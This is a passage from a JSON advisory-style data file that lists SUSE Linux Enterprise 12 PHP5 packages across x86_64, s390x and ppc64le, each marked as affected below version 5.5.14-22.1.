"arch": "x86_64", "packageFilename": "php5-wddx-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-wddx-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-mbstring-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-mbstring-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-gd-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-gd-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-gmp-5.5.14-22.1.s390x.rpm", "packageName": "php5-gmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-gettext-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-gettext-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-debugsource-5.5.14-22.1.x86_64.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-pgsql-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-pgsql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sqlite-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sqlite-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-suhosin-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-suhosin-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-dom-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sysvmsg-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sysvmsg", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-5.5.14-22.1.s390x.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sysvshm-5.5.14-22.1.s390x.rpm", "packageName": "php5-sysvshm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sysvsem-5.5.14-22.1.s390x.rpm", "packageName": "php5-sysvsem", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-zip-5.5.14-22.1.x86_64.rpm", "packageName": "php5-zip", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-exif-5.5.14-22.1.s390x.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sysvsem-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sysvsem-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-wddx-5.5.14-22.1.s390x.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "apache2-mod_php5-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "apache2-mod_php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-ftp-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-bz2-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-bz2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-shmop-5.5.14-22.1.s390x.rpm", "packageName": "php5-shmop", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-pdo-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-pdo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sysvsem-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sysvsem", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-dba-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-dba-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-pgsql-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-calendar-5.5.14-22.1.x86_64.rpm", "packageName": "php5-calendar", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sysvshm-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sysvshm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-exif-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-exif-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-iconv-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-iconv-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-xmlwriter-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-xmlwriter", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-curl-5.5.14-22.1.s390x.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-intl-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-intl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-exif-5.5.14-22.1.x86_64.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sockets-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sockets", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-xmlrpc-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-zlib-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-zlib", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-ldap-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-ldap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-pcntl-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-pcntl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-odbc-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-odbc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-iconv-5.5.14-22.1.x86_64.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-pspell-5.5.14-22.1.s390x.rpm", "packageName": "php5-pspell", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-snmp-5.5.14-22.1.s390x.rpm", "packageName": "php5-snmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-dom-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-dom-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-exif-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-gettext-5.5.14-22.1.s390x.rpm", "packageName": "php5-gettext", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-pgsql-5.5.14-22.1.s390x.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-gettext-5.5.14-22.1.x86_64.rpm", "packageName": "php5-gettext", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-pcntl-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-pcntl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-odbc-5.5.14-22.1.s390x.rpm", "packageName": "php5-odbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-bz2-5.5.14-22.1.s390x.rpm", "packageName": "php5-bz2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-debugsource-5.5.14-22.1.s390x.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-pspell-5.5.14-22.1.x86_64.rpm", "packageName": "php5-pspell", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-calendar-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-calendar-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-fileinfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-fileinfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-ctype-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-ctype-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-shmop-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-shmop-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-wddx-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-xmlrpc-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-xmlrpc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sysvsem-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sysvsem", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-mcrypt-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-mcrypt", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-openssl-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-openssl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-soap-5.5.14-22.1.x86_64.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-zip-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-zip-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-soap-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-soap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-mcrypt-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-mcrypt-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-pcntl-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-pcntl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-ctype-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-ctype-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-bcmath-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-bcmath-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-fileinfo-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-fileinfo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-zlib-5.5.14-22.1.x86_64.rpm", "packageName": "php5-zlib", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-xsl-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-xsl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-ftp-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-ftp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-debugsource-5.5.14-22.1.s390x.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-mbstring-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-suhosin-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-suhosin-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-gd-5.5.14-22.1.x86_64.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-intl-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-intl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-dba-5.5.14-22.1.s390x.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-iconv-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-pgsql-5.5.14-22.1.x86_64.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-mysql-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-soap-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-shmop-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-shmop-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-tokenizer-5.5.14-22.1.x86_64.rpm", "packageName": "php5-tokenizer", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-json-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-json-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-mbstring-5.5.14-22.1.s390x.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-gd-5.5.14-22.1.s390x.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-tokenizer-5.5.14-22.1.s390x.rpm", "packageName": "php5-tokenizer", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-ftp-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-ftp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-json-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-json-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-gmp-5.5.14-22.1.x86_64.rpm", "packageName": "php5-gmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-fpm-5.5.14-22.1.x86_64.rpm", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-xmlreader-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-xmlreader-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-dom-5.5.14-22.1.s390x.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-snmp-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-snmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-fileinfo-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-fileinfo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-gmp-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-gmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-xmlwriter-5.5.14-22.1.s390x.rpm", "packageName": "php5-xmlwriter", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-mysql-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-mysql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-xmlwriter-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-xmlwriter-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-enchant-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-enchant-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-devel-5.5.14-22.1.x86_64.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "apache2-mod_php5-5.5.14-22.1.s390x.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-odbc-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-odbc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-dba-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-5.5.14-22.1.ppc64le.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-xsl-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-xsl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-mcrypt-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-mcrypt-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-pspell-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-pspell-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-zlib-5.5.14-22.1.s390x.rpm", "packageName": "php5-zlib", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-suhosin-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-suhosin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-intl-5.5.14-22.1.x86_64.rpm", "packageName": "php5-intl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-json-5.5.14-22.1.x86_64.rpm", "packageName": "php5-json", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-pdo-5.5.14-22.1.s390x.rpm", "packageName": "php5-pdo", "operator": "lt"}, 